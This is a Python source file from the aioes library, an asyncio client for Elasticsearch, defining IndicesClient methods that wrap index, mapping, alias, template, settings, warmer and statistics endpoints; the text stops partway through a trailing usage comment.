"Apache-2.0"
] | null | null | null |
aioes/client/indices.py
|
DLizogub/aioes
|
51658066f35699e871c8ba02e133b725043dcb84
|
[
"Apache-2.0"
] | null | null | null |
aioes/client/indices.py
|
DLizogub/aioes
|
51658066f35699e871c8ba02e133b725043dcb84
|
[
"Apache-2.0"
] | 1
|
2017-03-02T12:41:16.000Z
|
2017-03-02T12:41:16.000Z
|
import asyncio
from .utils import NamespacedClient
from .utils import _make_path
from aioes.exception import NotFoundError
default = object()
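# `default` is a shared sentinel: identity checks like `timeout is not default`
# in the methods below distinguish "argument not supplied" from falsy values a
# caller passed on purpose (None, 0, '', False), which a plain truthiness test
# would silently drop from `params`.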
class IndicesClient(NamespacedClient):
@asyncio.coroutine
def analyze(self, index=None, body=None, *,
analyzer=default, char_filters=default, field=default,
filters=default, prefer_local=default, text=default,
tokenizer=default, token_filters=default):
"""Run analyze tool.
Perform the analysis process on a text and return the tokens
breakdown of the text.
"""
params = {}
if analyzer is not default:
params['analyzer'] = analyzer
if char_filters is not default:
params['char_filters'] = char_filters
if field is not default:
params['field'] = field
if filters is not default:
params['filters'] = filters
if prefer_local is not default:
params['prefer_local'] = prefer_local
if text is not default:
params['text'] = text
if tokenizer is not default:
params['tokenizer'] = tokenizer
if token_filters is not default:
params['token_filters'] = token_filters
_, data = yield from self.transport.perform_request(
'GET',
_make_path(index, '_analyze'),
params=params, body=body)
return data
@asyncio.coroutine
def refresh(self, index=None, *,
allow_no_indices=default, expand_wildcards=default,
ignore_indices=default, ignore_unavailable=default,
force=default):
"""Refresh index.
Explicitly refresh one or more index, making all operations performed
since the last refresh available for search.
"""
params = {}
if force is not default:
params['force'] = bool(force)
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if expand_wildcards is not default:
if not isinstance(expand_wildcards, str):
raise TypeError("'expand_wildcards' parameter is not a string")
elif expand_wildcards.lower() in ('open', 'closed'):
params['expand_wildcards'] = expand_wildcards.lower()
else:
raise ValueError("'expand_wildcards' parameter should be one"
" of 'open', 'closed'")
if ignore_indices is not default:
params['ignore_indices'] = ignore_indices
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
_, data = yield from self.transport.perform_request(
'POST',
_make_path(index, '_refresh'),
params=params)
return data
@asyncio.coroutine
def flush(self, index=None, *,
force=default, full=default, allow_no_indices=default,
expand_wildcards=default, ignore_indices=default,
ignore_unavailable=default):
"""Explicitly flush one or more indices."""
params = {}
if force is not default:
params['force'] = bool(force)
if full is not default:
params['full'] = bool(full)
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if expand_wildcards is not default:
if not isinstance(expand_wildcards, str):
raise TypeError("'expand_wildcards' parameter is not a string")
elif expand_wildcards.lower() in ('open', 'closed'):
params['expand_wildcards'] = expand_wildcards.lower()
else:
raise ValueError("'expand_wildcards' parameter should be one"
" of 'open', 'closed'")
if ignore_indices is not default:
params['ignore_indices'] = ignore_indices
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
_, data = yield from self.transport.perform_request(
'POST',
_make_path(index, '_flush'),
params=params)
return data
@asyncio.coroutine
def create(self, index, body=None, *, timeout=default,
master_timeout=default):
"""Create an index in Elasticsearch."""
params = {}
if timeout is not default:
params['timeout'] = timeout
if master_timeout is not default:
params['master_timeout'] = master_timeout
_, data = yield from self.transport.perform_request(
'PUT',
_make_path(index),
params=params,
body=body)
return data
@asyncio.coroutine
def open(self, index, *, timeout=default, master_timeout=default,
allow_no_indices=default, expand_wildcards=default,
ignore_unavailable=default):
"""Open a closed index to make it available for search."""
params = {}
if timeout is not default:
params['timeout'] = timeout
if master_timeout is not default:
params['master_timeout'] = master_timeout
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if expand_wildcards is not default:
if not isinstance(expand_wildcards, str):
raise TypeError("'expand_wildcards' parameter is not a string")
elif expand_wildcards.lower() in ('open', 'closed'):
params['expand_wildcards'] = expand_wildcards.lower()
else:
raise ValueError("'expand_wildcards' parameter should be one"
" of 'open', 'closed'")
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
_, data = yield from self.transport.perform_request(
'POST',
_make_path(index, '_open'),
params=params)
return data
@asyncio.coroutine
def close(self, index, *, allow_no_indices=default,
expand_wildcards=default, ignore_unavailable=default,
master_timeout=default, timeout=default):
"""Close index.
Close an index to remove its overhead from the cluster. A closed index
is blocked for read/write operations.
"""
params = {}
if timeout is not default:
params['timeout'] = timeout
if master_timeout is not default:
params['master_timeout'] = master_timeout
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if expand_wildcards is not default:
if not isinstance(expand_wildcards, str):
raise TypeError("'expand_wildcards' parameter is not a string")
elif expand_wildcards.lower() in ('open', 'closed'):
params['expand_wildcards'] = expand_wildcards.lower()
else:
raise ValueError("'expand_wildcards' parameter should be one"
" of 'open', 'closed'")
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
_, data = yield from self.transport.perform_request(
'POST',
_make_path(index, '_close'),
params=params)
return data
@asyncio.coroutine
def delete(self, index, *,
timeout=default, master_timeout=default):
"""Delete an index in Elasticsearch."""
params = {}
if timeout is not default:
params['timeout'] = timeout
if master_timeout is not default:
params['master_timeout'] = master_timeout
_, data = yield from self.transport.perform_request(
'DELETE',
_make_path(index),
params=params)
return data
@asyncio.coroutine
def exists(self, index, *,
allow_no_indices=default, expand_wildcards=default,
ignore_unavailable=default, local=default):
"""Return a boolean indicating whether given index exists."""
params = {}
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if expand_wildcards is not default:
if not isinstance(expand_wildcards, str):
raise TypeError("'expand_wildcards' parameter is not a string")
elif expand_wildcards.lower() in ('open', 'closed'):
params['expand_wildcards'] = expand_wildcards.lower()
else:
raise ValueError("'expand_wildcards' parameter should be one"
" of 'open', 'closed'")
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
if local is not default:
params['local'] = bool(local)
try:
yield from self.transport.perform_request(
'HEAD', _make_path(index), params=params)
except NotFoundError:
return False
return True
@asyncio.coroutine
def exists_type(self, index, doc_type, *,
allow_no_indices=default, expand_wildcards=default,
ignore_indices=default, ignore_unavailable=default,
local=default):
"""Check if a type/types exists in an index/indices."""
params = {}
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if ignore_indices is not default:
params['ignore_indices'] = ignore_indices
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
if local is not default:
params['local'] = bool(local)
if expand_wildcards is not default:
if not isinstance(expand_wildcards, str):
raise TypeError("'expand_wildcards' parameter is not a string")
elif expand_wildcards.lower() in ('open', 'closed'):
params['expand_wildcards'] = expand_wildcards.lower()
else:
raise ValueError("'expand_wildcards' parameter should be one"
" of 'open', 'closed'")
try:
yield from self.transport.perform_request(
'HEAD', _make_path(index, doc_type), params=params)
except NotFoundError:
return False
return True
@asyncio.coroutine
def put_mapping(self, index, doc_type, body, *,
allow_no_indices=default, expand_wildcards=default,
ignore_conflicts=default, ignore_unavailable=default,
master_timeout=default, timeout=default):
"""Register specific mapping definition for a specific type."""
params = {}
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if expand_wildcards is not default:
params['expand_wildcards'] = bool(expand_wildcards)
if ignore_conflicts is not default:
params['ignore_conflicts'] = bool(ignore_conflicts)
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
if master_timeout is not default:
params['master_timeout'] = master_timeout
if timeout is not default:
params['timeout'] = timeout
_, data = yield from self.transport.perform_request(
'PUT', _make_path(index, '_mapping', doc_type),
params=params, body=body)
return data
@asyncio.coroutine
def get_mapping(self, index, doc_type=None, *,
ignore_unavailable=default, allow_no_indices=default,
expand_wildcards=default, local=default):
"""Retrieve mapping definition of index or index/type."""
params = {}
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if expand_wildcards is not default:
params['expand_wildcards'] = bool(expand_wildcards)
if local is not default:
params['local'] = bool(local)
_, data = yield from self.transport.perform_request(
'GET', _make_path(index, '_mapping', doc_type),
params=params
)
return data
@asyncio.coroutine
def delete_mapping(self, index, doc_type, *,
master_timeout=default):
"""Delete a mapping (type) along with its data."""
params = {}
if master_timeout is not default:
params['master_timeout'] = master_timeout
_, data = yield from self.transport.perform_request(
'DELETE', _make_path(index, '_mapping', doc_type),
params=params
)
return data
@asyncio.coroutine
def get_field_mapping(self, field, index=None, doc_type=None, *,
include_defaults=default, ignore_unavailable=default,
allow_no_indices=default, expand_wildcards=default,
local=default):
"""
Retrieve mapping definition of a specific field.
`<http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/indices-get-field-mapping.html>`_
:arg index: A comma-separated list of index names; use `_all` or empty
string for all indices
:arg doc_type: A comma-separated list of document types
:arg field: A comma-separated list of fields to retrieve the
mapping for
:arg include_defaults: A boolean indicating whether to return
default values
:arg allow_no_indices: Whether to ignore if a wildcard indices
expression resolves into no concrete indices. (This includes
`_all` string or when no indices have been specified)
:arg expand_wildcards: Whether to expand wildcard expression to
concrete indices that are open, closed or both.
:arg ignore_unavailable: Whether specified concrete indices should
be ignored when unavailable (missing or closed)
:arg local: Return local information, do not retrieve the state from
master node (default: false)
"""
params = {}
if include_defaults is not default:
params['include_defaults'] = bool(include_defaults)
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if expand_wildcards is not default:
params['expand_wildcards'] = bool(expand_wildcards)
if local is not default:
params['local'] = bool(local)
_, data = yield from self.transport.perform_request(
'GET', _make_path(index, '_mapping', doc_type, 'field', field),
params=params
)
return data
@asyncio.coroutine
def put_alias(self, name, index=None, body=None, *,
timeout=default, master_timeout=default):
"""
Create an alias for a specific index/indices.
`<http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/indices-aliases.html>`_
:arg index: A comma-separated list of index names the alias should
point to (supports wildcards); use `_all` or omit to perform the
operation on all indices.
:arg name: The name of the alias to be created or updated
:arg body: The settings for the alias, such as `routing` or `filter`
:arg master_timeout: Specify timeout for connection to master
:arg timeout: Explicit timestamp for the document
"""
params = {}
if timeout is not default:
params['timeout'] = timeout
if master_timeout is not default:
params['master_timeout'] = master_timeout
_, data = yield from self.transport.perform_request(
'PUT', _make_path(index, '_alias', name),
params=params, body=body
)
return data
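    # Usage sketch (illustrative): the alias body may carry standard options
    # such as ``routing`` or a ``filter`` clause, e.g.
    #
    #     yield from es.indices.put_alias(
    #         'my-alias', index='my-index',
    #         body={'routing': '1',
    #               'filter': {'term': {'user': 'kimchy'}}})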
@asyncio.coroutine
def exists_alias(self, name, index=None, *, allow_no_indices=default,
expand_wildcards=default, ignore_indices=default,
ignore_unavailable=default, local=default):
"""
Return a boolean indicating whether given alias exists.
`<http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/indices-aliases.html>`_
:arg name: A comma-separated list of alias names to return
:arg index: A comma-separated list of index names to filter aliases
:arg allow_no_indices: Whether to ignore if a wildcard indices
expression resolves into no concrete indices. (This includes
`_all` string or when no indices have been specified)
:arg expand_wildcards: Whether to expand wildcard expression
to concrete indices that are open, closed or both.
        :arg ignore_indices: When performed on multiple indices, allows
            `missing` ones to be ignored (default: none)
:arg ignore_unavailable: Whether specified concrete indices should
be ignored when unavailable (missing or closed)
:arg local: Return local information, do not retrieve the state from
master node (default: false)
"""
params = {}
if ignore_indices is not default:
params['ignore_indices'] = bool(ignore_indices)
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if expand_wildcards is not default:
params['expand_wildcards'] = bool(expand_wildcards)
if local is not default:
params['local'] = bool(local)
try:
yield from self.transport.perform_request(
'HEAD', _make_path(index, '_alias', name),
params=params
)
except NotFoundError:
return False
return True
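    # Usage sketch (illustrative): the HEAD request is mapped to a boolean
    # above, so the result can be tested directly, e.g.
    #
    #     if (yield from es.indices.exists_alias('my-alias')):
    #         ...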
@asyncio.coroutine
def get_alias(self, index=None, name=None, *, allow_no_indices=default,
expand_wildcards=default, ignore_indices=default,
ignore_unavailable=default, local=default):
"""
Retrieve a specified alias.
`<http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/indices-aliases.html>`_
:arg name: A comma-separated list of alias names to return
:arg index: A comma-separated list of index names to filter aliases
:arg allow_no_indices: Whether to ignore if a wildcard indices
expression resolves into no concrete indices. (This includes
`_all` string or when no indices have been specified)
:arg expand_wildcards: Whether to expand wildcard expression
to concrete indices that are open, closed or both.
        :arg ignore_indices: When performed on multiple indices, allows
            `missing` ones to be ignored (default: none)
:arg ignore_unavailable: Whether specified concrete indices should
be ignored when unavailable (missing or closed)
:arg local: Return local information, do not retrieve the state from
master node (default: false)
"""
params = {}
if ignore_indices is not default:
params['ignore_indices'] = bool(ignore_indices)
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if expand_wildcards is not default:
params['expand_wildcards'] = bool(expand_wildcards)
if local is not default:
params['local'] = bool(local)
_, data = yield from self.transport.perform_request(
'GET', _make_path(index, '_alias', name),
params=params
)
return data
@asyncio.coroutine
def get_aliases(self, index=None, name=None, *, local=default,
timeout=default):
"""
        Retrieve specified aliases.
`<http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/indices-aliases.html>`_
:arg index: A comma-separated list of index names to filter aliases
:arg name: A comma-separated list of alias names to filter
:arg local: Return local information, do not retrieve the state from
master node (default: false)
:arg timeout: Explicit operation timeout
"""
params = {}
if timeout is not default:
params['timeout'] = timeout
if local is not default:
params['local'] = bool(local)
_, data = yield from self.transport.perform_request(
'GET', _make_path(index, '_aliases', name),
params=params
)
return data
@asyncio.coroutine
def update_aliases(self, body, *, timeout=default,
master_timeout=default):
"""
Update specified aliases.
`<http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/indices-aliases.html>`_
:arg body: The definition of `actions` to perform
:arg master_timeout: Specify timeout for connection to master
:arg timeout: Request timeout
"""
params = {}
if timeout is not default:
params['timeout'] = timeout
if master_timeout is not default:
            params['master_timeout'] = master_timeout
_, data = yield from self.transport.perform_request(
'POST', '/_aliases',
params=params, body=body
)
return data
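    # Usage sketch (illustrative): the ``actions`` in the body are applied
    # atomically, so an alias can be switched between indices in one call:
    #
    #     yield from es.indices.update_aliases(body={
    #         'actions': [
    #             {'remove': {'index': 'logs-old', 'alias': 'logs'}},
    #             {'add': {'index': 'logs-new', 'alias': 'logs'}},
    #         ]})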
@asyncio.coroutine
def delete_alias(self, index, name, *, timeout=default,
master_timeout=default):
"""
Delete specific alias.
`<http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/indices-aliases.html>`_
:arg index: A comma-separated list of index names (supports wildcards);
use `_all` for all indices
:arg name: A comma-separated list of aliases to delete (supports
wildcards); use `_all` to delete all aliases for the
specified indices.
:arg master_timeout: Specify timeout for connection to master
        :arg timeout: Explicit operation timeout
"""
params = {}
if timeout is not default:
params['timeout'] = timeout
if master_timeout is not default:
            params['master_timeout'] = master_timeout
_, data = yield from self.transport.perform_request(
'DELETE', _make_path(index, '_alias', name),
params=params
)
return data
@asyncio.coroutine
def put_template(self, name, body, *, create=default, order=default,
timeout=default, master_timeout=default,
flat_settings=default):
"""
        Create an index template that will automatically be applied to new
        indices as they are created.
`<http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/indices-templates.html>`_
:arg name: The name of the template
:arg body: The template definition
:arg create: Whether the index template should only be added if new or
can also replace an existing one
:arg order: The order for this template when merging multiple matching
ones (higher numbers are merged later, overriding the
lower numbers)
:arg master_timeout: Specify timeout for connection to master
:arg timeout: Explicit operation timeout
:arg flat_settings: Return settings in flat format (default: false)
"""
params = {}
if create is not default:
params['create'] = create
if order is not default:
params['order'] = order
if timeout is not default:
params['timeout'] = timeout
if master_timeout is not default:
params['master_timeout'] = master_timeout
if flat_settings is not default:
params['flat_settings'] = bool(flat_settings)
_, data = yield from self.transport.perform_request(
'PUT', _make_path('_template', name),
params=params, body=body
)
return data
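    # Usage sketch (illustrative): a minimal template body for the
    # Elasticsearch 1.x API this client targets, e.g.
    #
    #     yield from es.indices.put_template('log-template', body={
    #         'template': 'logs-*',
    #         'settings': {'number_of_shards': 1}})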
@asyncio.coroutine
def exists_template(self, name, *, local=default):
"""
Return a boolean indicating whether given template exists.
`<http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/indices-templates.html>`_
:arg name: The name of the template
:arg local: Return local information, do not retrieve the state from
master node (default: false)
"""
params = {}
if local is not default:
params['local'] = bool(local)
try:
yield from self.transport.perform_request(
'HEAD', _make_path('_template', name),
params=params
)
except NotFoundError:
return False
return True
@asyncio.coroutine
def get_template(self, name=None, *, flat_settings=default,
local=default):
"""
Retrieve an index template by its name.
`<http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/indices-templates.html>`_
:arg name: The name of the template
:arg flat_settings: Return settings in flat format (default: false)
:arg local: Return local information, do not retrieve the state from
master node (default: false)
"""
params = {}
if local is not default:
params['local'] = bool(local)
if flat_settings is not default:
params['flat_settings'] = bool(flat_settings)
_, data = yield from self.transport.perform_request(
'GET', _make_path('_template', name),
params=params
)
return data
@asyncio.coroutine
def delete_template(self, name, *, timeout=default,
master_timeout=default):
"""
Delete an index template by its name.
`<http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/indices-templates.html>`_
:arg name: The name of the template
:arg master_timeout: Specify timeout for connection to master
:arg timeout: Explicit operation timeout
"""
params = {}
if timeout is not default:
params['timeout'] = timeout
if master_timeout is not default:
params['master_timeout'] = master_timeout
_, data = yield from self.transport.perform_request(
'DELETE', _make_path('_template', name),
params=params
)
return data
@asyncio.coroutine
def get_settings(self, index=None, name=None, *,
expand_wildcards=default, ignore_indices=default,
ignore_unavailable=default, flat_settings=default,
local=default):
"""Retrieve settings for one or more (or all) indices."""
params = {}
if ignore_indices is not default:
params['ignore_indices'] = str(ignore_indices)
if flat_settings is not default:
params['flat_settings'] = bool(flat_settings)
if expand_wildcards is not default:
if not isinstance(expand_wildcards, str):
raise TypeError("'expand_wildcards' parameter is not a string")
elif expand_wildcards.lower() in ('open', 'closed'):
params['expand_wildcards'] = expand_wildcards.lower()
else:
raise ValueError("'expand_wildcards' parameter should be one"
" of 'open', 'closed'")
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
if local is not default:
params['local'] = bool(local)
_, data = yield from self.transport.perform_request(
'GET', _make_path(index, '_settings', name),
params=params)
return data
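    # Usage sketch (illustrative):
    #
    #     settings = yield from es.indices.get_settings(
    #         index='my-index', flat_settings=True)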
@asyncio.coroutine
def put_settings(self, body, index=None, *,
allow_no_indices=default, expand_wildcards=default,
flat_settings=default, ignore_unavailable=default,
master_timeout=default):
"""Change specific index level settings in real time."""
params = {}
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if flat_settings is not default:
params['flat_settings'] = bool(flat_settings)
if expand_wildcards is not default:
if not isinstance(expand_wildcards, str):
raise TypeError("'expand_wildcards' parameter is not a string")
elif expand_wildcards.lower() in ('open', 'closed'):
params['expand_wildcards'] = expand_wildcards.lower()
else:
raise ValueError("'expand_wildcards' parameter should be one"
" of 'open', 'closed'")
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
if master_timeout is not default:
params['master_timeout'] = master_timeout
_, data = yield from self.transport.perform_request(
'PUT', _make_path(index, '_settings'),
params=params, body=body)
return data
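    # Usage sketch (illustrative): only dynamic settings can be updated on a
    # live index, e.g. the replica count:
    #
    #     yield from es.indices.put_settings(
    #         {'index': {'number_of_replicas': 2}}, index='my-index')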
@asyncio.coroutine
def put_warmer(self, name, body, index=None, doc_type=None, *,
allow_no_indices=default, expand_wildcards=default,
ignore_unavailable=default, master_timeout=default):
"""
Create an index warmer to run registered search requests to warm up the
index before it is available for search.
`<http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/indices-warmers.html>`_
:arg name: The name of the warmer
:arg body: The search request definition for the warmer
(query, filters, facets, sorting, etc)
:arg index: A comma-separated list of index names to register
the warmer for; use `_all` or omit to perform the operation
on all indices
:arg doc_type: A comma-separated list of document types to register the
warmer for; leave empty to perform the operation on all types
:arg allow_no_indices: Whether to ignore if a wildcard indices
expression resolves into no concrete indices in the search request
to warm. (This includes `_all` string or when no indices have been
specified)
:arg expand_wildcards: Whether to expand wildcard expression
to concrete indices that are open, closed or both, in the
            search request to warm (default: open)
:arg ignore_unavailable: Whether specified concrete indices should be
ignored when unavailable (missing or closed) in the search request
to warm
:arg master_timeout: Specify timeout for connection to master
"""
params = {}
if master_timeout is not default:
params['master_timeout'] = master_timeout
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if expand_wildcards is not default:
params['expand_wildcards'] = bool(expand_wildcards)
if doc_type and not index:
index = '_all'
_, data = yield from self.transport.perform_request(
'PUT', _make_path(index, doc_type, '_warmer', name),
params=params, body=body
)
return data
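    # Usage sketch (illustrative): the warmer body is an ordinary search
    # request, e.g.
    #
    #     yield from es.indices.put_warmer(
    #         'warm-all', body={'query': {'match_all': {}}},
    #         index='my-index')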
@asyncio.coroutine
def get_warmer(self, index=None, doc_type=None, name=None, *,
allow_no_indices=default, expand_wildcards=default,
ignore_unavailable=default, local=default):
"""
        Retrieve an index warmer.
`<http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/indices-warmers.html>`_
:arg index: A comma-separated list of index names to restrict the
operation; use `_all` to perform the operation on all indices
:arg doc_type: A comma-separated list of document types to restrict the
operation; leave empty to perform the operation on all types
:arg name: The name of the warmer (supports wildcards); leave empty to
get all warmers
:arg allow_no_indices: Whether to ignore if a wildcard indices
expression resolves into no concrete indices. (This includes `_all`
string or when no indices have been specified)
:arg expand_wildcards: Whether to expand wildcard expression
            to concrete indices that are open, closed or both (default: open)
:arg ignore_unavailable: Whether specified concrete indices should be
ignored when unavailable (missing or closed)
:arg local: Return local information, do not retrieve the state from
master node (default: false)
"""
params = {}
if local is not default:
params['local'] = bool(local)
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if expand_wildcards is not default:
params['expand_wildcards'] = bool(expand_wildcards)
_, data = yield from self.transport.perform_request(
'GET', _make_path(index, doc_type, '_warmer', name),
params=params
)
return data
@asyncio.coroutine
def delete_warmer(self, index, name, *, master_timeout=default):
"""
Delete an index warmer.
`<http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/indices-warmers.html>`_
:arg index: A comma-separated list of index names to delete
warmers from (supports wildcards); use `_all` to perform
the operation on all indices.
:arg name: A comma-separated list of warmer names to delete (supports
wildcards); use `_all` to delete all warmers in the
specified indices.
:arg master_timeout: Specify timeout for connection to master
"""
params = {}
if master_timeout is not default:
params['master_timeout'] = master_timeout
_, data = yield from self.transport.perform_request(
'DELETE', _make_path(index, '_warmer', name),
params=params
)
return data
@asyncio.coroutine
def snapshot_index(self, index=None, *, allow_no_indices=default,
expand_wildcards=default, ignore_indices=default,
ignore_unavailable=default):
"""
        Explicitly perform a snapshot through the gateway of one or more
        indices (i.e. back them up).
`<http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/indices-gateway-snapshot.html>`_
:arg index: A comma-separated list of index names; use `_all` or empty
string for all indices
:arg allow_no_indices: Whether to ignore if a wildcard indices
expression resolves into no concrete indices. (This includes
`_all` string or when no indices have been specified)
:arg expand_wildcards: Whether to expand wildcard expression
to concrete indices that are open, closed or both.
        :arg ignore_indices: When performed on multiple indices, allows
            `missing` ones to be ignored (default: none)
:arg ignore_unavailable: Whether specified concrete indices should
be ignored when unavailable (missing or closed)
"""
params = {}
if ignore_indices is not default:
            params['ignore_indices'] = bool(ignore_indices)
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if expand_wildcards is not default:
params['expand_wildcards'] = bool(expand_wildcards)
_, data = yield from self.transport.perform_request(
'POST',
_make_path(index, '_gateway', 'snapshot'), params=params
)
return data
@asyncio.coroutine
def status(self, index=None, *,
allow_no_indices=default, expand_wildcards=default,
ignore_indices=default, ignore_unavailable=default,
operation_threading=default, recovery=default, snapshot=default,
human=default):
"""Get a comprehensive status information of one or more indices."""
params = {}
if ignore_indices is not default:
params['ignore_indices'] = ignore_indices
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if recovery is not default:
params['recovery'] = bool(recovery)
if snapshot is not default:
params['snapshot'] = bool(snapshot)
if operation_threading is not default:
params['operation_threading'] = operation_threading
if expand_wildcards is not default:
if not isinstance(expand_wildcards, str):
raise TypeError("'expand_wildcards' parameter is not a string")
elif expand_wildcards.lower() in ('open', 'closed'):
params['expand_wildcards'] = expand_wildcards.lower()
else:
raise ValueError("'expand_wildcards' parameter should be one"
" of 'open', 'closed'")
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
if human is not default:
params['human'] = bool(human)
_, data = yield from self.transport.perform_request(
'GET', _make_path(index, '_status'),
params=params)
return data
@asyncio.coroutine
def stats(self, index=None, *, metric=default,
completion_fields=default, docs=default,
fielddata_fields=default, fields=default,
groups=default, allow_no_indices=default,
expand_wildcards=default, ignore_indices=default,
ignore_unavailable=default, human=default, level=default,
types=default):
"""Retrieve statistics on operations happening on an index."""
params = {}
if completion_fields is not default:
params['completion_fields'] = completion_fields
if docs is not default:
params['docs'] = docs
if types is not default:
params['types'] = types
if fielddata_fields is not default:
params['fielddata_fields'] = fielddata_fields
if fields is not default:
params['fields'] = fields
if groups is not default:
params['groups'] = groups
if ignore_indices is not default:
params['ignore_indices'] = ignore_indices
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
if human is not default:
params['human'] = bool(human)
if level is not default:
if not isinstance(level, str):
raise TypeError("'level' parameter is not a string")
elif level.lower() in ('cluster', 'indices', 'shards'):
params['level'] = level.lower()
else:
raise ValueError("'level' parameter should be one"
" of 'cluster', 'indices', 'shards'")
if expand_wildcards is not default:
if not isinstance(expand_wildcards, str):
raise TypeError("'expand_wildcards' parameter is not a string")
elif expand_wildcards.lower() in ('open', 'closed'):
params['expand_wildcards'] = expand_wildcards.lower()
else:
raise ValueError("'expand_wildcards' parameter should be one"
" of 'open', 'closed'")
if metric is not default:
if not isinstance(metric, str):
raise TypeError("'metric' parameter is not a string")
elif metric.lower() in ('_all', 'completion', 'docs', 'fielddata',
'filter_cache', 'flush', 'get', 'id_cache',
'indexing', 'merge', 'percolate',
'refresh', 'search', 'segments', 'store',
'warmer'):
params['metric'] = metric.lower()
else:
raise ValueError("'expand_wildcards' parameter should be one"
" of '_all', 'completion', 'docs', "
"'fielddata', 'filter_cache', 'flush', "
"'get', 'id_cache', 'indexing', 'merge', "
"'percolate', 'refresh', 'search', "
"'segments', 'store', 'warmer'")
_, data = yield from self.transport.perform_request(
'GET', _make_path(index, '_stats', metric),
params=params)
return data
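    # Usage sketch (illustrative): restrict the statistics to a single metric
    # from the whitelist validated above, e.g.
    #
    #     docs_stats = yield from es.indices.stats(
    #         index='my-index', metric='docs')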
@asyncio.coroutine
def segments(self, index=None, *,
allow_no_indices=default, expand_wildcards=default,
ignore_indices=default, ignore_unavailable=default,
human=default):
"""Get segments information.
Provide low level segments information that a Lucene index (shard
level) is built with.
"""
params = {}
if ignore_indices is not default:
params['ignore_indices'] = ignore_indices
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if expand_wildcards is not default:
if not isinstance(expand_wildcards, str):
raise TypeError("'expand_wildcards' parameter is not a string")
elif expand_wildcards.lower() in ('open', 'closed'):
params['expand_wildcards'] = expand_wildcards.lower()
else:
raise ValueError("'expand_wildcards' parameter should be one"
" of 'open', 'closed'")
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
if human is not default:
params['human'] = bool(human)
_, data = yield from self.transport.perform_request(
'GET', _make_path(index, '_segments'), params=params)
return data
@asyncio.coroutine
def optimize(self, index=None, *,
flush=default, allow_no_indices=default,
expand_wildcards=default, ignore_indices=default,
ignore_unavailable=default, max_num_segments=default,
only_expunge_deletes=default, operation_threading=default,
wait_for_merge=default, force=default):
"""Explicitly optimize one or more indices through an API."""
params = {}
if force is not default:
params['force'] = bool(force)
if flush is not default:
params['flush'] = bool(flush)
if max_num_segments is not default:
params['max_num_segments'] = int(max_num_segments)
if ignore_indices is not default:
params['ignore_indices'] = ignore_indices
if only_expunge_deletes is not default:
params['only_expunge_deletes'] = bool(only_expunge_deletes)
if operation_threading is not default:
params['operation_threading'] = operation_threading
if wait_for_merge is not default:
params['wait_for_merge'] = bool(wait_for_merge)
if allow_no_indices is not default:
params['allow_no_indices'] = bool(allow_no_indices)
if expand_wildcards is not default:
if not isinstance(expand_wildcards, str):
raise TypeError("'expand_wildcards' parameter is not a string")
elif expand_wildcards.lower() in ('open', 'closed'):
params['expand_wildcards'] = expand_wildcards.lower()
else:
raise ValueError("'expand_wildcards' parameter should be one"
" of 'open', 'closed'")
if ignore_unavailable is not default:
params['ignore_unavailable'] = bool(ignore_unavailable)
_, data = yield from self.transport.perform_request(
'POST', _make_path(index, '_optimize'), params=params)
return data
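    # Usage sketch (illustrative): force-merging a read-only index down to a
    # single segment is the common use of this call, e.g.
    #
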